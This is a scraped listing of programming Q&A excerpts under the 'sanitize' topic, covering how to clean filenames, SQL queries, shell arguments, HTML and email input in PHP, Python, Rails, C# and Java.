sanitize

Turn a string into a valid filename in Python

I have a string that I want to use as a filename, so I want to remove all characters that wouldn't be allowed in filenames, using Python. I'd rather be strict than otherwise, so let's say I want to retain only letters, digits, and a small set of other characters like "_-.() ". What's the most elegant solution? The filename needs to be ...

C# Sanitize File Name

I recently have been moving a bunch of MP3s from various locations into a repository. I had been constructing the new file names using the ID3 tags (thanks, TagLib-Sharp!), and I noticed that I was getting a System.NotSupportedException: "The given path's format is not supported." This was generated by either File.Copy() or Directory.Cre...

Rails ActiveRecord: Inserting text containing unprintable/weird characters

I am inserting some text from scraped web into my database. some of the fields in the string have unprintable/weird characters. For example, if text is "C__O__?__P__L__E__T__E", then the text in the database is stored only as "C__O__" I know about h(), strip_tags()... sanitize, ... etc etc. But I do not want to sanitize this SQL. Th...

jQuery catch paste input

I'm looking for a way to sanitize input that I paste into the browser, is this possible to do with jQuery? I've managed to come up with this so far: $(this).live(pasteEventName, function(e) { // this is where i would like to sanitize my input return false; } Unfortunately my development has come to a screeching hold because of this...

Xcode, Cocoa: Filtering/Sanitizing User Input. Best Approach

To clarify, I want to check for valid characters. For first name, last name I want to check for [A-Za-z]. For Email I want to check for chars valid for email. What algorithm would I use to CHECK user input? Specifically, I'd like to CHECK the user's first name, last name and email address for valid characters before I add to database. ...

Replacing Microsoft Word Newline Character in Python

This feels like it should be an easy one, but I'm having trouble cleaning out the newline character in content pasted from Microsoft Word. Not a full line-break, but the CTRL ENTER character that shows up as a return arrow in Word. I've tried chr(10), chr(13), \u000D, \u000A and a few others, but I can't match it in a string.replace(). S...

Sanitize user input destined for database in PHP

I have this code: $query = "select id from votes where username = '$user' and article_id = $this->id"; I tried this code to sanitize it: $query = sprintf("select id from votes where username = '$user' and article_id = $this->id", mysql_real_escape_string($user), mysql_real_escape_string($password)); but I get this error ...

Best way to sanitize exec command with user inserted variables.

I'm coding a web interface to a horrible piece of propitiatory software our company uses. the software has no real UI and requires us giving putty access to our system for our clients to even pull data. My web interface has to run an exec(); function and it has to pass a few variables the user inputs. $command = "report-call '$type' '$s...

Sanitizing PHP input to ping program.

I would like to interface a php page to the linux command line program ping. I realize that there are sanitation issues. Is there a builtin library or function that can take care of everything, or will I have to rely on regex parsers? ...

Php safe output

Hola When outputting user input I use this function: function bbkoda($text) { $text = htmlspecialchars($text); $text = nl2br($text); $hitta = array( "'\[b](.*?)\[/b]'is", "'\[i](.*?)\[/i]'is" ); $byt = array( "<b>\\1</b>", "<i>\\1</i>" ); $text = preg_replace($hitt...

Is it dangerous thing to view access log without sanitizing via web browser?

Is it dangerous thing to view access log without sanitizing via web browser? I am considering to record access log, and I am considering to view it via wev browser, but if attacker modifies his remote host or user agent or something, can he attack to me? By inserting attacking code into his remote host or user agent or ect. So do I ne...

How to sanitze user input in PHP before mailing?

I have a simple PHP mailer script that takes values from a form submitted via POST and mails them to me: <?php $to = "[email protected]"; $name = $_POST['name']; $message = $_POST['message']; $email = $_POST['email']; $body = "Person $name submitted a message: $message"; $subject = "A message has been submitted"; $headers = 'From: ' ....

User input, PHP, Javascript and security

Hi, I am working on a directions service where users enter the from and to addresses and get the directions table ( that gives turn by turn information ) along with a map showing the route. Below is the complete source code ( getdirections.php ): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm...

Sanitize SQL in custom conditions

I need to create a simple search but I can't afford to use Sphinx. Here's what I wrote: keywords = input.split(/\s+/) queries = [] keywords.each do |keyword| queries << sanitize_sql_for_conditions( "(classifications.species LIKE '%#{keyword}%' OR classifications.family LIKE '%#{keyword}%' OR ...

How best to sanitize rich html with rails?

Hi there, I'm looking for advice on how to clean submitted html in a web app so it can be redisplayed in future with out styles or unclosed tags wrecking the layout of an app. On my app rich HTML is submitted by users with YUI Rich text editor, which by default runs a few regexps to clean the input, and I'm also calling the [filter_M...

Strip Inline CSS and JavaScript in Rails

I'm working on a Rails application and I would like to know what's the best way to strip blocks of CSS or JavaScript. <style> ... </style> -or- <script> ... </script> I'm using the *strip_tags* helper to take care of most of the HTML, but it leaves a bunch of CSS when the content contains inline CSS. Thanks ...

To sanitize all user's input in PostgreSQL by PHP

This question is based on this thread. Do you need the explicit sanitizing when you use pg_prepare? I feel that pg_prepare sanitizes the user's input automatically such that we do not need this $question_id = filter_input(INPUT_GET, 'questions', FILTER_SANITIZE_NUMBER_INT); Context where I use Postgres $result = pg_prepare($dbco...

When to filter/sanitize data: before database insertion or before display?

As I prepare to tackle the issue of input data filtering and sanitization, I'm curious whether there's a best (or most used) practice? Is it better to filter/sanitize the data (of HTML, JavaScript, etc.) before inserting the data into the database, or should it be done when the data is being prepared for display in HTML? A few notes: ...

Is my anti XSS method OK for allowing user HTML in PHP?

I am working on finding a good way to make user submitted data, in this case allow HTML and have it be as safe and fast as I can. I know EVERY SINGLE PERSON on this site seems to think http://htmlpurifier.org is the answer here. I do agree partially. htmlpurifier has the best open source code out there for filtering user submitted H...

Function to Sanitize HTML Id attribute in Java

I have coded the next function. But surely someone has a more elegant way to perform this task. /** * * HTML 4 Specification * ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number * of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods ("."). * @param s * @re...